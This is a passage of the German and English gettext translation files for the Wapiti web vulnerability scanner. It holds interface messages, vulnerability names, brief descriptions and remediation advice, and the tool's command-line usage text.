../attack/mod_permanentxss.py:280 msgid "Found permanent XSS attacked by {0} with fields {1}" msgstr "Persistentes XSS gefunden, angegriffen durch {0} mit den Feldern {1}" #: ../attack/mod_sql.py:39 ../attack/mod_sql.py:41 msgid "MySQL Injection" msgstr "MySQL Injektion" #: ../attack/mod_sql.py:43 msgid "Access-Based SQL Injection" msgstr "Access-basierte SQL-Injektion" #: ../attack/mod_sql.py:45 ../attack/mod_sql.py:47 ../attack/mod_sql.py:49 #: ../attack/mod_sql.py:70 msgid "MSSQL-Based Injection" msgstr "MSSQL-basierte Injektion" #: ../attack/mod_sql.py:52 msgid "Java.SQL Injection" msgstr "Java.SQL Injektion" #: ../attack/mod_sql.py:54 msgid "PostgreSQL Injection" msgstr "PostgreSQL Injektion" #: ../attack/mod_sql.py:56 ../attack/mod_sql.py:58 msgid "XPath Injection" msgstr "XPath Injektion" #: ../attack/mod_sql.py:60 msgid "LDAP Injection" msgstr "LDAP Injektion" #: ../attack/mod_sql.py:62 msgid "DB2 Injection" msgstr "DB2 Injektion" #: ../attack/mod_sql.py:64 msgid "Interbase Injection" msgstr "Interbase Injektion" #: ../attack/mod_sql.py:66 msgid "Sybase Injection" msgstr "Sybase Injektion" #: ../attack/mod_sql.py:68 msgid ".NET SQL Injection" msgstr ".NET SQL Injektion" #: ../attack/mod_sql.py:72 msgid "Acess-Based SQL Injection" msgstr "Acess-basierte SQL Injektion" #: ../attack/mod_sql.py:76 msgid "Oracle Injection" msgstr "Oracle Injektion" #: ../attack/mod_xss.py:59 msgid "XSS vulnerability" msgstr "XSS-Schwachstelle" #: ../attack/mod_xss.py:126 ../attack/mod_xss.py:337 msgid "XSS vulnerability found via injection in the resource path" msgstr "XSS-Schwachstelle gefunden durch Injektion in den Ressourcenpfad" #: ../attack/mod_xss.py:196 msgid "XSS vulnerability found via injection in the query string" msgstr "XSS-Schwachstelle gefunden durch Injektion in den Query-String" #: ../attack/mod_xss.py:270 ../attack/mod_xss.py:437 msgid "XSS vulnerability found via injection in the parameter {0}" msgstr "XSS -Schwachstelle gefunden durch Injektion in den Parameter {0}" #: ../net/getcookie.py:97 msgid "No forms found in this page !" msgstr "Keine Formulare auf der Seite gefunden !" #: ../net/getcookie.py:104 msgid "Choose the form you want to use :" msgstr "Wählen Sie ein Formular aus :" #: ../net/getcookie.py:113 msgid "Enter a number : " msgstr "Geben Sie eine Nummer ein : " #: ../net/getcookie.py:120 msgid "Please enter values for the following form: " msgstr "Bitte geben Sie Werte für das folgende Formular ein: " #: ../net/getcookie.py:121 msgid "url = {0}" msgstr "URL = {0}" #: ../net/cookie.py:75 msgid "Error getting url {0}" msgstr "Fehler beim Abruf der URL {0}" #: ../net/lswww.py:164 msgid "First argument must be the root url !" msgstr "Erster Parameter muss die root-URL sein !" #: ../net/lswww.py:169 msgid "Invalid protocol: {0}" msgstr "Ungültiges Protokoll: {0}" #: ../net/lswww.py:208 msgid "Invalid link argument: {0}" msgstr "Ungültiger Link-Parameter: {0}" #: ../net/lswww.py:266 msgid "Connection refused!" msgstr "Verbindung abgelehnt!" #: ../net/lswww.py:270 msgid "Exception in lswww.browse: {0}" msgstr "Ausnahme in lswww.browse: {0}" #: ../net/lswww.py:665 msgid "File {0} loaded, the scan continues:" msgstr "Datei {0} geladen, der Scan wird fortgesetzt:" #: ../net/lswww.py:667 msgid " * URLs to browse" msgstr " * URLs zu durchsuchen" #: ../net/lswww.py:670 msgid " * URLs browsed" msgstr " * URLs durchsucht" #: ../net/lswww.py:674 msgid "File {0} not found, Wapiti will scan again the web site" msgstr "Datei {0} nicht gefunden, Wapiti wird die Website noch einmal scannen" #: ../net/lswww.py:707 ../net/lswww.py:715 msgid " Notice" msgstr " Hinweis" #: ../net/lswww.py:709 msgid "This scan has been saved in the file {0}/{1}.xml" msgstr "Dieser Scan wurde in der Datei {0}/{1}.xml gespeichert" #: ../net/lswww.py:711 msgid "You can use it to perform attacks without scanning again the web site with the \"-k\" parameter" msgstr "Sie können es nutzen, um Angriffe ohne erneuten Scan der Website mit dem \"-k\" Parameter durchzuführen" #: ../net/lswww.py:717 msgid "Scan stopped, the data has been savedin the file {0}/{1}.xml" msgstr "Scan gestoppt, die Daten wurden in der Datei {0}/{1}.xml gespeichert" #: ../net/lswww.py:719 msgid "To continue this scan, you should launch Wapiti with the \"-i\" parameter" msgstr "Um diesen Scan fortzusetzen, sollten Sie Wapiti mit dem \"-i\" Parameter starten" #: ../net/lswww.py:729 msgid "URLs" msgstr "URLs" #: ../net/lswww.py:736 msgid "Forms Info" msgstr "Formular-Info" #: ../net/lswww.py:738 msgid "From: {0}" msgstr "Von: {0}" #: ../net/lswww.py:739 msgid "To: {0}" msgstr "An: {0}" #: ../net/lswww.py:747 msgid "Upload Scripts" msgstr "Upload-Skripte" #: ../net/lswww.py:1008 msgid "Forms" msgstr "Formulare" #: ../net/lswww.py:1011 msgid "Form {0}" msgstr "Formular {0}" #: ../net/lswww.py:1015 msgid " * Method: {0}" msgstr " * Methode: {0}" #: ../net/lswww.py:1016 msgid " * Intputs:" msgstr " * Eingabefelder:" #: ../net/lswww.py:1021 msgid " * Selects:" msgstr " * Auswahlfelder:" #: ../net/lswww.py:1026 msgid " * TextAreas:" msgstr " * Textbereiche:" #: ../net/lswww.py:1032 msgid "URLS" msgstr "URLS" #: ../report/txtreportgenerator.py:69 msgid "Report for {0}\n" msgstr "Bericht für {0}\n" #: ../report/txtreportgenerator.py:70 msgid "Date of the scan : {0}\n" msgstr "Datum des Scans : {0}\n" #: ../report/txtreportgenerator.py:72 msgid "Scope of the scan : {0}\n" msgstr "Suchmuster des Scans : {0}\n" #: ../report/txtreportgenerator.py:75 msgid "Summary of vulnerabilities :" msgstr "Zusammenfassung der Schwachstellen :" #: ../report/txtreportgenerator.py:78 msgid "{0} : {1:>3}\n" msgstr "{0} : {1:>3}\n" #: ../report/txtreportgenerator.py:88 ../report/txtreportgenerator.py:105 msgid "Evil request:\n" msgstr "Bösartige Anfrage:\n" #: ../report/txtreportgenerator.py:91 msgid "cURL command PoC : \"{0}\"" msgstr "cURL Befehl PoC : \"{0}\"" #: ../report/txtreportgenerator.py:97 msgid "Anomalies found:" msgstr "Anomalien gefunden:" #: ../wapiti.py:560 ../wapiti.py:559 msgid "Attack process interrupted. To perform again the attack, lauch Wapiti with \"-i\" or \"-k\" parameter." msgstr "Angriffsprozess wurde unterbrochen. Um den Angriff neu zu starten, führen Sie Wapiti mit den \"-i\" oder \"-k\" Parametern aus." #: ../wapiti.py:551 msgid "File {0} not found. Wapiti will scan the web site again" msgstr "Datei {0} nicht gefunden. Wapiti wird die Website erneut scannen" msgid "[!] Unable to find a module named {0}" msgstr "[!] Konnte kein Modul mit dem Namen {0} finden" msgid "Backup file description" msgstr "" "Es könnte möglich sein, Sicherungsdateien von Skripten auf dem Webserver zu " "finden, die der Webadmin dort abgelegt hat um eine ältere Version zu speichern " "oder es könnten automatisch erzeugte Sicherungsdateien der Editor-Software " "sein (zum Beispiel Emacs). Diese Kopien könnten interessante Informationen wie " "Quellcode oder Zugangsdaten enthalten" msgid "Backup file solution" msgstr "" "Der Webadmin muss die Sicherungsdateien manuell vom Server löschen oder sie " "aus dem Wurzelverzeichnis entfernen. Er sollte auch seinen Editor neu " "konfigurieren, um automatische Sicherungen zu deaktivieren." msgid "Blind SQL Injection description" msgstr "" "Blinde SQL-Injection ist eine Technik, die eine Schwachstelle ausnutzt, die " "in der Datenbank einer Anwendung auftritt. Diese Art von Schwachstelle ist " "schwerer zu erkennen als einfache SQL-Inkektionen weil keine Fehlermeldungen " "auf der Webseite ausgegeben werden." msgid "Blind SQL Injection solution" msgstr "" "Um sich gegen SQL-Injektion zu schützen, sollten Nutzereingaben nicht direkt " "in SQL-Abfragen eingebettet werden. Stattdessen sollten Nutzereingaben " "'escaped' oder gefiltert werden oder es sollten parametrisierte Abfragen " "verwendet werden." msgid "Commands execution description" msgstr "" "Dieser Angriff besteht darin, auf dem Server Befehle auszuführen. Der " "Angreifer versucht, diese Befehle in die Anfrageparameter zu injizieren" msgid "Commands execution solution" msgstr "Bei Dateisystemaufrufen vorzugsweise ohne Nutzereingaben arbeiten" msgid "CRLF description" msgstr "" "Der Begriff CRLF verweist auf den 'Carriage Return' (ASCII 13, \\r) 'Line " "Feed' (ASCII 10, \\n). Es wird genutzt um das Zeilende festzulegen, " "allerdings wird damit in heutigen häufig genutzten Betriebssystemen " "unterschiedlich umgegangen. Zum Beispiel: In Windows werden sowohl CR als " "auch LF benötigt, um ein Zeilenende festzulegen, wohingegen unter Linux/ " "UNIX nur ein LF benötigt wird. Diese Kombination aus CR und LF wird zum " "Beispiel benutzt wenn man 'Enter' auf der Tastatur drückt. Abhängig von " "der genutzten Anwendung weist 'Enter' diese an, eine neue Zeile zu " "beginnen oder um einen Befehl zu senden." msgid "CRLF solution" msgstr "" "Prüfen Sie die angegebenen Parameter verhindern Sie die Injektion von CRLF, " "indem Sie es filtern" msgid "Cross Site Scripting description" msgstr "" "Cross-Site-Scripting (XSS) ist eine Art von Schwachstelle, die häufig in " "Webanwendungen gefunden wird, die es erlauben, dass Code von bösartigen " "Nutzern in Webseiten, die von anderen Nutzern eingesehen werden können, " "injiziert wird. Beispiele solcher Codes sind HTML-Codes und clientseitige " "Skripte." msgid "Cross Site Scripting solution" msgstr "" "Die Beste Art, eine Webanwendung vor XSS-Attacken zu schützen ist sicherzustellen, " "dass die Anwendung eine Validierung aller Header, Cookies, Query-Strings, " "Formularfelder und versteckter Felder durchführt. Das Kodieren von Nutzereingaben " "auf dem Server kann auch XSS-Schwachstellen besiegen, indem man verhindert, " "dass in Formularen ausführbare Skripte eingefügt werden können. Anwendungen " "können einen signifikanten Schutz vor JavaScript-basierten Angriffen erlangen, " "indem sie die folgenden Zeichen in der gesamten Ausgabe durch die entsprechenden " "HTML-Entities umwandeln: <, >, &, ", ', (, ), #, %, ; , +, -." msgid "File Handling description" msgstr "" "Dieser Angriff ist auch bekannt als 'Path Traversal' oder 'Directory Traversal', " "sein Ziel ist es, den Zugriff zu Dateien und Verzeichnissen, die außerhalb des " "Webroots liegen, zu erlangen. Der Angreifer versucht, die Verzeichnisse auf dem " "Webserver zu erkunden. Der Angreifer benutzt dabei einige Techniken, zum Beispiel " "die Manipulation der Variablen die auf Dateien verweisen mit Sequenzen von " "'Punkt-Punkt-Slash (../)' und deren Variationen, um zum Wurzelverzeichnis zu " "wechseln und so durch das Dateisystem zu navigieren." msgid "File Handling solution" msgstr "" "Ziehen Sie es vor, ohne Nutzereingaben zu arbeiten, wenn Sie Systemaufrufe " "verwenden. Nutzen Sie besser tatsächliche Dateinamen in Templates oder " "Sprachdateien (z.B.: Der Wert 5 aus der Nutzereingabe = Tschechisch, anstatt " "zu erwarten, dass der Nutzer 'Tschechisch' übergibt). Stellen Sie sicher, " "dass Nutzer nicht alle Teile eines Dateipfades übergeben können - stellen Sie " "Ihren Pfad selbst voran. Validieren Sie Nutzereingaben, indem Sie nur gute " "Eingaben akzeptieren - verbessern Sie die Eingaben nicht. Nutzen Sie durch " "chroot geschützte Bereiche und Codezugangsrichtlinien, um einzuschränken, " "wo Dateien gelesen oder gespeichert werden können." msgid "Htaccess bypass description" msgstr "" "htaccess-Dateien werden genutzt um Zugriffe auf einige Dateien über HTTP " "einzuschränken. In einigen Fällen kann es möglich sein, diese Einschränkungen " "zu umgehen und auf diese Dateien zuzugreifen." msgid "Htaccess bypass solution" msgstr "Stellen Sie sicher, dass bei falschen Zugangsdaten jede HTTP-Methode verboten ist." msgid "Internal server error description" msgstr "Ein Fehler der es verhindert die Anfrage zu verarbeiten ist auf der Serverseite aufgetreten. Es könnte das Anzeichen einer Schwachstelle sein" msgid "Internal server error solution" msgstr "Weitere Informationen über den Fehler sollten Sie in den Serverlogs finden." msgid "Potentially dangerous file description" msgstr "Eine Datei mit möglichen Schwachstellen wurde auf der Website gefunden" msgid "Potentially dangerous file solution" msgstr "Stellen Sie sicher, dass das Skript auf dem neuesten Stand ist und schränken Sie den Zugriff darauf ein" msgid "Resource consumption description" msgstr "Der Server brauchte eine ungewöhnlich lange Zeit, um die Anfrage zu verarbeiten. Ein Angreifer könnte diese Schwachstelle nutzen um den Server zu überladen" msgid "Resource consumption solution" msgstr "Das betreffende Skript könnte Serverressourcen (CPU, Arbeitsspeicher, Netzwerk, Dateizugriff...) auf ineffiziente Weise nutzen" msgid "SQL Injection description" msgstr "" "SQL-Injektions-Schwachstellen erlauben einem Angreifer, die Abfragen die in der Datenbank ausgeführt werden, zu verändern. " "Ein Angreifer könnte dann in der Lage sein, Informationen die in der Datenbank gespeichert sind auszulesen, zu verändern oder sogar " "seine Priviligien auf dem System zu erhöhen." msgid "SQL Injection solution" msgstr "" "Um sich gegen SQL-Injektion zu schützen, sollten Nutzereingaben nicht direkt " "in SQL-Abfragen eingebettet werden. Stattdessen sollten Nutzereingaben " "'escaped' oder gefiltert werden oder es sollten parametrisierte Abfragen " "genutzt werden." wapiti-2.3.0+dfsg/wapitiCore/language_sources/en.po000066400000000000000000000634651240201516300223360ustar00rootroot00000000000000# Copyright (C) YEAR 2009-2013 Nicolas SURRIBAS # This file is distributed under the same license as the Wapiti package. # #, fuzzy msgid "" msgstr "" "Project-Id-Version: Wapiti SVN\n" "Report-Msgid-Bugs-To: \n" "POT-Creation-Date: 2013-08-25 17:33+0200\n" "PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n" "Last-Translator: FULL NAME \n" "Language-Team: LANGUAGE \n" "Language: \n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" #: ../vulnerability.py:23 msgid " Evil url: {0}" msgstr " Evil url: {0}" #: ../vulnerability.py:24 msgid "{0} in {1} via injection in the parameter {2}" msgstr "{0} in {1} via injection in the parameter {2}" #: ../vulnerability.py:25 msgid " coming from {0}" msgstr " coming from {0}" #: ../vulnerability.py:26 msgid "{0} in {1} via injection in the query string" msgstr "{0} in {1} via injection in the query string" #: ../vulnerability.py:27 msgid "{0} in {1} via injection in the resource path" msgstr "{0} in {1} via injection in the resource path" #: ../vulnerability.py:28 msgid "Involved parameter: {0}" msgstr "Involved parameter: {0}" #: ../vulnerability.py:29 msgid "Evil request:" msgstr "Evil request:" #: ../vulnerability.py:67 msgid "SQL Injection" msgstr "SQL Injection" #: ../vulnerability.py:68 msgid "Blind SQL Injection" msgstr "Blind SQL Injection" #: ../vulnerability.py:69 msgid "File Handling" msgstr "File Handling" #: ../vulnerability.py:70 msgid "Cross Site Scripting" msgstr "Cross Site Scripting" #: ../vulnerability.py:72 msgid "Commands execution" msgstr "Commands execution" #: ../vulnerability.py:73 msgid "Htaccess Bypass" msgstr "Htaccess Bypass" #: ../vulnerability.py:74 msgid "Backup file" msgstr "Backup file" #: ../vulnerability.py:75 msgid "Potentially dangerous file" msgstr "Potentially dangerous file" #: ../vulnerability.py:80 msgid "Internal Server Error" msgstr "Internal Server Error" #: ../vulnerability.py:81 msgid "Resource consumption" msgstr "Resource consumption" #: ../vulnerability.py:83 msgid "Received a HTTP 500 error in {0}" msgstr "Received a HTTP 500 error in {0}" #: ../vulnerability.py:84 msgid "Timeout occured in {0}" msgstr "Timeout occured in {0}" #: ../vulnerability.py:86 msgid "The request timed out while attempting to inject a payload in the query string" msgstr "The request timed out while attempting to inject a payload in the query string" #: ../vulnerability.py:87 msgid "The request timed out while attempting to inject a payload in the resource path" msgstr "The request timed out while attempting to inject a payload in the resource path" #: ../vulnerability.py:88 msgid "The request timed out while attempting to inject a payload in the parameter {0}" msgstr "The request timed out while attempting to inject a payload in the parameter {0}" #: ../vulnerability.py:90 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the query string" msgstr "The server responded with a 500 HTTP error code while attempting to inject a payload in the query string" #: ../vulnerability.py:92 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the resource path" msgstr "The server responded with a 500 HTTP error code while attempting to inject a payload in the resource path" #: ../vulnerability.py:94 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}" msgstr "The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}" #: ../wapiti.py:69 msgid "Invalid argument for option {0} : {1}" msgstr "Invalid argument for option {0} : {1}" #: ../wapiti.py:226 msgid "[*] Loading modules:" msgstr "[*] Loading modules:" #: ../wapiti.py:297 msgid "No links or forms found in this page !" msgstr "No links or forms found in this page !" #: ../wapiti.py:298 msgid "Make sure the url is correct." msgstr "Make sure the url is correct." #: ../wapiti.py:310 msgid "[!] Missing dependecies for module {0}:" msgstr "[!] Missing dependecies for module {0}:" #: ../wapiti.py:316 msgid "[+] Launching module {0}" msgstr "[+] Launching module {0}" #: ../wapiti.py:321 msgid "Upload scripts found:" msgstr "Upload scripts found:" #: ../wapiti.py:335 msgid "Report" msgstr "Report" #: ../wapiti.py:337 msgid "A report has been generated in the file {0}" msgstr "A report has been generated in the file {0}" #: ../wapiti.py:339 msgid "Open {0}/index.html with a browser to see this report." msgstr "Open {0}/index.html with a browser to see this report." #: ../wapiti.py:410 msgid "wapitiDoc" msgstr "" "Wapiti-2.3.0 - Web application vulnerability scanner \n" " \n" " Usage: python wapiti.py http://server.com/base/url/ [options] \n" " \n" " Supported options are: \n" " -s \n" " --start \n" " \tTo specify an url to start with. This option can be called several times.\n" " \tWapiti will browse these links to find more URLs even if the specified link is not in the scope.\n" " \n" " -x \n" " --exclude \n" " \tTo exclude an URL from the scan (eg: logout URLs). This option can be called several times to specify several URLs.\n" " \tWildcards (*) can be used in URLs for basic regex.\n" " \tExample : -x http://server/base/?page=*&module=test\n" " \tor -x http://server/base/admin/* to exclude a directory.\n" " \n" " -p \n" " --proxy \n" " \tTo specify a proxy. Currently supported proxies are HTTP and HTTPS.\n" " \tThis option can be called twice to specify the HTTP and the HTTPS proxy.\n" " \tExample: -p http://proxy:port/\n" " \n" " -c \n" " --cookie \n" " \tTo import cookies to use for the scan. The cookie file must be in JSON format.\n" " \tCookies can be grabbed using the cookie.py and getcookie.py utilities (net directory).\n" " \n" " -t \n" " --timeout \n" " \tTo set the timeout (maximum time in seconds to wait for the server to send a response).\n" " \n" " -a \n" " --auth \n" " \tSet credentials for HTTP authentication.\n" " \n" " --auth-method \n" " \tIf the server requires an authentication, set the authentication method to use.\n" " \tCurrently supported methods are (some requires additional modules to install):\n" " \t\t+ basic\n" " \t\t+ digest\n" " \t\t+ kerberos\n" " \t\t+ ntlm\n" " \n" " -r \n" " --remove \n" " \tRemove a parameter (name and value) from URLs.\n" " \n" " -n \n" " --nice \n" " \tDefine a limit of URLs to browse with the same pattern (ie, the maximum number of unique values for the same parameter).\n" " \tUse this option to prevent endless loops during scan. Limit must be greater than 0.\n" " \n" " -m \n" " --module \n" " \tSet the modules (and HTTP methods for each module) to use for attacks.\n" " \tPrefix a module name with a dash to deactivate the related module.\n" " \tTo only browse the target (without sending any payloads), deactivate every module with -m \"-all\".\n" " \tIf you don't specify the HTTP methods, GET and POST will be used.\n" " \tExample: -m \"-all,xss:get,exec:post\"\n" " \n" " -u \n" " --color \n" " \tUse colors to highlight vulnerabilities and anomalies in output. \n" " \n" " -v \n" " --verbose \n" " \tSet the verbosity level. \n" " \t0: quiet (default), 1: print each URL, 2: print every attack. \n" " \n" " -b \n" " --scope \n" " \tSet the scope of the scan:\n" " \t\t+ page: to analyse only the page given as the root URL.\n" " \t\t+ folder: to analyse all the URLs under the root URL passed to Wapiti (default).\n" " \t\t+ domain: to analyse all the links to the pages which are in the same domain as the URL passed to Wapiti.\n" " \n" " -f \n" " --format \n" " \tSet the format type for the report. \n" " \tjson: Report in JSON format \n" " \thtml: Report in HTML format (default)\n" " \topenvas: Report in OpenVAS XML format \n" " \ttxt: Report in plain text (UTF-8) \n" " \tvulneranet: Report in VulneraNET (XML based) format \n" " \txml: Report in XML format \n" " \n" " -o \n" " --output \n" " \tSet the name of the report file. \n" " \tIf the selected report format is 'html', this parameter will be used as a directory name.\n" " \n" " -i \n" " --continue \n" " \tThis parameter indicates to Wapiti to resume the previous scan saved in the\n" "specified XML status file.\n" " \tThe file name is optional, if not specified, Wapiti takes the default " "file from the \"scans\" folder.\n" " \n" " -k \n" " --attack \n" " \tThis parameter indicates to Wapiti to resume the attacks without scanning the " "website again, loading the scan status from the specified file.\n" " \tThe file name is optional, if it is not specified, Wapiti takes the default " "file from the \"scans\" folder.\n" " \n" " --verify-ssl <0|1>\n" " \tThis parameter indicates whether Wapiti must check SSL certificates.\n" " \tDefault is to verify certificates\n" " \n" " -h \n" " --help \n" " \tTo print this usage message\n" " " #: ../wapiti.py:418 msgid "Wapiti-2.3.0 (wapiti.sourceforge.net)" msgstr "Wapiti-2.3.0 (wapiti.sourceforge.net)" #: ../wapiti.py:549 msgid "File {0} loaded. Wapiti will use it to perform the attack" msgstr "File {0} loaded. Wapiti will use it to perform the attack" #: ../attack/attack.py:166 msgid "+ attackGET {0}" msgstr "+ attackGET {0}" #: ../attack/attack.py:171 ../attack/attack.py:185 #: ../attack/mod_permanentxss.py:87 ../attack/mod_permanentxss.py:89 #: ../attack/mod_permanentxss.py:147 ../attack/mod_permanentxss.py:272 msgid "error: {0} while attacking {1}" msgstr "error: {0} while attacking {1}" #: ../attack/attack.py:173 ../attack/attack.py:187 msgid "error: timeout while attacking {0}" msgstr "error: timeout while attacking {0}" #: ../attack/attack.py:180 msgid "+ attackPOST {0} from {1}" msgstr "+ attackPOST {0} from {1}" #: ../attack/mod_backup.py:89 msgid "Found backup file !" msgstr "Found backup file !" #: ../attack/mod_backup.py:94 msgid "Backup file {0} found for {1}" msgstr "Backup file {0} found for {1}" #: ../attack/mod_blindsql.py:40 msgid "Blind SQL vulnerability" msgstr "Blind SQL vulnerability" #: ../attack/mod_blindsql.py:93 ../attack/mod_file.py:146 #: ../attack/mod_sql.py:131 msgid "{0} via injection in the query string" msgstr "{0} via injection in the query string" #: ../attack/mod_blindsql.py:141 ../attack/mod_blindsql.py:222 #: ../attack/mod_exec.py:195 ../attack/mod_exec.py:292 #: ../attack/mod_file.py:211 ../attack/mod_file.py:301 #: ../attack/mod_sql.py:258 msgid "{0} via injection in the parameter {1}" msgstr "{0} via injection in the parameter {1}" #: ../attack/mod_crlf.py:31 msgid "CRLF Injection" msgstr "CRLF Injection" #: ../attack/mod_crlf.py:70 ../attack/mod_crlf.py:77 msgid "(QUERY_STRING)" msgstr "(QUERY_STRING)" #: ../attack/mod_crlf.py:121 msgid "Error: The server did not understand this request" msgstr "Error: The server did not understand this request" #: ../attack/mod_exec.py:45 msgid "Command execution" msgstr "Command execution" #: ../attack/mod_exec.py:48 msgid "PHP evaluation" msgstr "PHP evaluation" #: ../attack/mod_exec.py:51 ../attack/mod_exec.py:54 msgid "Warning exec" msgstr "Warning exec" #: ../attack/mod_exec.py:57 ../attack/mod_exec.py:63 msgid "preg_replace injection" msgstr "preg_replace injection" #: ../attack/mod_exec.py:60 msgid "Warning usort()" msgstr "Warning usort()" #: ../attack/mod_exec.py:66 msgid "Warning assert" msgstr "Warning assert" #: ../attack/mod_exec.py:69 msgid "Evalutation warning" msgstr "Evaluation warning" #: ../attack/mod_file.py:40 msgid "Remote inclusion vulnerability" msgstr "Remote inclusion vulnerability" #: ../attack/mod_file.py:41 msgid "Linux local file disclosure vulnerability" msgstr "Linux local file disclosure vulnerability" #: ../attack/mod_file.py:42 msgid "BSD local file disclosure vulnerability" msgstr "BSD local file disclosure vulnerability" #: ../attack/mod_file.py:43 msgid "Windows local file disclosure vulnerability" msgstr "Windows local file disclosure vulnerability" #: ../attack/mod_file.py:44 ../attack/mod_file.py:45 msgid "File disclosure vulnerability in include_path" msgstr "File disclosure vulnerability in include_path" #: ../attack/mod_file.py:46 msgid "highlight_file() vulnerability in basedir" msgstr "highlight_file() vulnerability in basedir" #: ../attack/mod_file.py:47 msgid "include() of file in include_path" msgstr "include() of file in include_path" #: ../attack/mod_file.py:84 msgid "Possible {0} vulnerability" msgstr "Possible {0} vulnerability" #: ../attack/mod_htaccess.py:75 msgid "HtAccess protection found: {0}" msgstr "HtAccess protection found: {0}" #: ../attack/mod_htaccess.py:85 msgid "|HTTP Code: {0} : {1}" msgstr "|HTTP Code: {0} : {1}" #: ../attack/mod_htaccess.py:88 ../attack/mod_htaccess.py:102 msgid "Source code:" msgstr "Source code:" #: ../attack/mod_htaccess.py:94 msgid "{0} HtAccess" msgstr "{0} HtAccess" #: ../attack/mod_htaccess.py:95 msgid " .htaccess bypass vulnerability: {0}" msgstr " .htaccess bypass vulnerability: {0}" #: ../attack/mod_htaccess.py:99 msgid "|HTTP Code: {0}" msgstr "|HTTP Code: {0}" #: ../attack/mod_nikto.py:75 msgid "Problem with local nikto database." msgstr "Problem with local nikto database." #: ../attack/mod_nikto.py:76 msgid "Downloading from the web..." msgstr "Downloading from the web..." #: ../attack/mod_nikto.py:90 msgid "Error downloading Nikto database" msgstr "Error downloading Nikto database" #: ../attack/mod_nikto.py:235 ../attack/mod_nikto.py:237 msgid "References:" msgstr "References:" #: ../attack/mod_permanentxss.py:57 msgid "Stored XSS vulnerability" msgstr "Stored XSS vulnerability" #: ../attack/mod_permanentxss.py:115 ../attack/mod_permanentxss.py:161 msgid "Found permanent XSS in {0} with {1}" msgstr "Found permanent XSS in {0} with {1}" #: ../attack/mod_permanentxss.py:213 ../attack/mod_permanentxss.py:280 msgid "Found permanent XSS attacked by {0} with fields {1}" msgstr "Found permanent XSS attacked by {0} with fields {1}" #: ../attack/mod_sql.py:39 ../attack/mod_sql.py:41 msgid "MySQL Injection" msgstr "MySQL Injection" #: ../attack/mod_sql.py:43 msgid "Access-Based SQL Injection" msgstr "Access-Based SQL Injection" #: ../attack/mod_sql.py:45 ../attack/mod_sql.py:47 ../attack/mod_sql.py:49 #: ../attack/mod_sql.py:70 msgid "MSSQL-Based Injection" msgstr "MSSQL-Based Injection" #: ../attack/mod_sql.py:52 msgid "Java.SQL Injection" msgstr "Java.SQL Injection" #: ../attack/mod_sql.py:54 msgid "PostgreSQL Injection" msgstr "PostgreSQL Injection" #: ../attack/mod_sql.py:56 ../attack/mod_sql.py:58 msgid "XPath Injection" msgstr "XPath Injection" #: ../attack/mod_sql.py:60 msgid "LDAP Injection" msgstr "LDAP Injection" #: ../attack/mod_sql.py:62 msgid "DB2 Injection" msgstr "DB2 Injection" #: ../attack/mod_sql.py:64 msgid "Interbase Injection" msgstr "Interbase Injection" #: ../attack/mod_sql.py:66 msgid "Sybase Injection" msgstr "Sybase Injection" #: ../attack/mod_sql.py:68 msgid ".NET SQL Injection" msgstr ".NET SQL Injection" #: ../attack/mod_sql.py:72 msgid "Acess-Based SQL Injection" msgstr "Acess-Based SQL Injection" #: ../attack/mod_sql.py:76 msgid "Oracle Injection" msgstr "Oracle Injection" #: ../attack/mod_xss.py:59 msgid "XSS vulnerability" msgstr "XSS vulnerability" #: ../attack/mod_xss.py:126 ../attack/mod_xss.py:337 msgid "XSS vulnerability found via injection in the resource path" msgstr "XSS vulnerability found via injection in the resource path" #: ../attack/mod_xss.py:196 msgid "XSS vulnerability found via injection in the query string" msgstr "XSS vulnerability found via injection in the query string" #: ../attack/mod_xss.py:270 ../attack/mod_xss.py:437 msgid "XSS vulnerability found via injection in the parameter {0}" msgstr "XSS vulnerability found via injection in the parameter {0}" #: ../net/getcookie.py:97 msgid "No forms found in this page !" msgstr "No forms found in this page !" #: ../net/getcookie.py:104 msgid "Choose the form you want to use :" msgstr "Choose the form you want to use :" #: ../net/getcookie.py:113 msgid "Enter a number : " msgstr "Enter a number : " #: ../net/getcookie.py:120 msgid "Please enter values for the following form: " msgstr "Please enter values for the following form: " #: ../net/getcookie.py:121 msgid "url = {0}" msgstr "url = {0}" #: ../net/cookie.py:75 msgid "Error getting url {0}" msgstr "Error getting url {0}" #: ../net/lswww.py:164 msgid "First argument must be the root url !" msgstr "First argument must be the root url !" #: ../net/lswww.py:169 msgid "Invalid protocol: {0}" msgstr "Invalid protocol: {0}" #: ../net/lswww.py:208 msgid "Invalid link argument: {0}" msgstr "Invalid link argument: {0}" #: ../net/lswww.py:266 msgid "Connection refused!" msgstr "Connection refused!" #: ../net/lswww.py:270 msgid "Exception in lswww.browse: {0}" msgstr "Exception in lswww.browse: {0}" #: ../net/lswww.py:665 msgid "File {0} loaded, the scan continues:" msgstr "File {0} loaded, the scan continues:" #: ../net/lswww.py:667 msgid " * URLs to browse" msgstr " * URLs to browse" #: ../net/lswww.py:670 msgid " * URLs browsed" msgstr " * URLs browsed" #: ../net/lswww.py:674 msgid "File {0} not found, Wapiti will scan again the web site" msgstr "File {0} not found, Wapiti will scan again the web site" #: ../net/lswww.py:707 ../net/lswww.py:715 msgid " Notice" msgstr " Notice" #: ../net/lswww.py:709 msgid "This scan has been saved in the file {0}/{1}.xml" msgstr "This scan has been saved in the file {0}/{1}.xml" #: ../net/lswww.py:711 msgid "You can use it to perform attacks without scanning again the web site with the \"-k\" parameter" msgstr "You can use it to perform attacks without scanning again the web site with the \"-k\" parameter" #: ../net/lswww.py:717 msgid "Scan stopped, the data has been savedin the file {0}/{1}.xml" msgstr "Scan stopped, the data has been saved in the file {0}/{1}.xml" #: ../net/lswww.py:719 msgid "To continue this scan, you should launch Wapiti with the \"-i\" parameter" msgstr "To continue this scan, you should launch Wapiti with the \"-i\" parameter" #: ../net/lswww.py:729 msgid "URLs" msgstr "URLs" #: ../net/lswww.py:736 msgid "Forms Info" msgstr "Forms Info" #: ../net/lswww.py:738 msgid "From: {0}" msgstr "From: {0}" #: ../net/lswww.py:739 msgid "To: {0}" msgstr "To: {0}" #: ../net/lswww.py:747 msgid "Upload Scripts" msgstr "Upload Scripts" #: ../net/lswww.py:1008 msgid "Forms" 